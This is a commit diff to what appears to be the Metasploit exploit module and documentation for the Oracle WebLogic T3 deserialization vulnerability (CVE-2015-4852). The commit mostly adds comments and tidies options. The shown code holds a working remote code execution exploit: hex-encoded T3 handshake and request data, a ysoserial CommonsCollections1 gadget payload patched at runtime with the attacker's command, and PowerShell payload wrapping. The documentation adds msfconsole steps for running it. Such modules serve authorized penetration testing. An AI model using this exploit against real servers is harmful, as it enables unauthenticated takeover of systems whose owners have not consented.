Improvements on code quality and documentation

2018-12-16 12:47:52 -08:00 · 2018-12-16 12:47:52 -08:00 · 48df4be54e
parent 8ce7643e41
commit 48df4be54e
2 changed files with 16 additions and 11 deletions
--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md
@ -1,13 +1,16 @@
 ## Description
 Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
 ## Vulnerable Application
 Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0.
+
 ## Verification Steps
 1. `./msfconsole -q`
 2. `use exploit/multi/misc/weblogic_deserialize_rawobject`
 3. `set rhosts <rhost>`
 4. `set rport <srvport>`
 5. `exploit`
+
 ## Scenarios
 ### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
 ```
--- a/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
@ -65,11 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
          ]
        ],
      'DefaultTarget' => 0,
-      'DefaultOptions' =>
-        {
-          'RPORT' => 7001
-        },
      'DisclosureDate' => 'Jan 28 2015'))
+
+    register_options([Opt::RPORT(7001)])
  end

  def check
@ -108,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def t3_handshake
+    # retrieved from network traffic
    shake = '74332031322e322e310a41533a323535'
    shake << '0a484c3a31390a4d533a313030303030'
    shake << '30300a0a'
@ -119,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def build_t3_request_object
    # T3 request serialized data
+    # retrieved by watching network traffic
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
    data << '700000000a000000030000000000000006007070707070700000000a00000003'
@ -180,18 +180,16 @@ class MetasploitModule < Msf::Exploit::Remote
    if target.name == 'Windows'
      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
      mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
-    elsif target.name == 'Unix'
+    elsif target.name == 'Unix' || target.name == 'Solaris'
      nix_cmd = payload.encoded
-      nix_cmd.prepend('/bin/sh -c ')
      mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
-    elsif target.name == 'Solaris'
-      sol_cmd = payload.encoded
-      mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
    end

+    # serializing manually the payload string
    serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
    serialized_cmd << mycmd

+    # basic weblogic ClassTableEntry object (serialized)
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
@ -207,7 +205,9 @@ class MetasploitModule < Msf::Exploit::Remote
    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
    payload << '78707702000078fe010000'

-    # new payload
+    # payload generated from ysoserial:
+    # java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe
+    # the command (calc.exe) is patched in runtime with the payload
    payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41'
    payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
    payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
@ -255,8 +255,9 @@ class MetasploitModule < Msf::Exploit::Remote
    payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
    payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
    payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
-    # serialized end
+    # end of payload object

+    # basic weblogic ImmutableServiceContext object (serialized)
    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
@ -266,6 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
    payload << '6f3b290000001b7878fe00ff'

+    # sets the length of the stream
    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
    data << payload